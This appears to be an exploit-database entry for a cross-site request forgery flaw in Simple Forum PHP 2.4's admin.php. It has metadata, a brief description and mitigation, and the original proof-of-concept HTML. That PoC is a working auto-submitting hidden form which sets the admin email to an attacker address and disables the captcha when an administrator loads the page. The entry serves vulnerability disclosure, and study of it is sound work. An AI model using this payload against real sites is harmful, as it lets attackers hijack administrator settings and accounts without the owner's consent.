Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)

vendor:

Simple Forum PHP

by:

Ashiyane Digital Security Team

8,8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: Simple Forum PHP

Affected Version From: 2.4

Affected Version To: 2.4

Patch Exists: NO

Related CWE: N/A

CPE: 2.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WebApp - PHP

2016

Simple Forum PHP 2.4 – Cross-Site Request Forgery (Edit Options)

Simple Forum PHP 2.4 is vulnerable to Cross-Site Request Forgery (CSRF) in the 'admin.php' page. An attacker can exploit this vulnerability to update the admin options such as email, captcha, captcha theme, items link, and time zone. The attacker can craft a malicious HTML page and send it to the admin of the application. When the admin visits the malicious page, the attacker's options will be updated.

Mitigation:

The application should implement a CSRF token to verify the authenticity of the request.

Source

Exploit-DB raw data:

<!--
=====================================================
# Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# Exploit:
-->
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://localhost/blog/admin.php" method="POST">
      <input type="hidden" name="act" value="addPost" />
	  <input type="hidden" name="act" value="updateOptionsAdmin" />
	  <input type="hidden" name="email" value="attacker@mail.com" />
	  <input type="hidden" name="captcha" value="nocap" /> <!--Set No
Captcha(unsecured)-->
	  <input type="hidden" name="captcha_theme" value="White theme" />
	  <input type="hidden" name="items_link"
value="http://localhost/demo_forum.php" />
	  <input type="hidden" name="time_zone" value="" />
      <input type="submit" value="Submit request" />
	  </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>
<!--
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
-->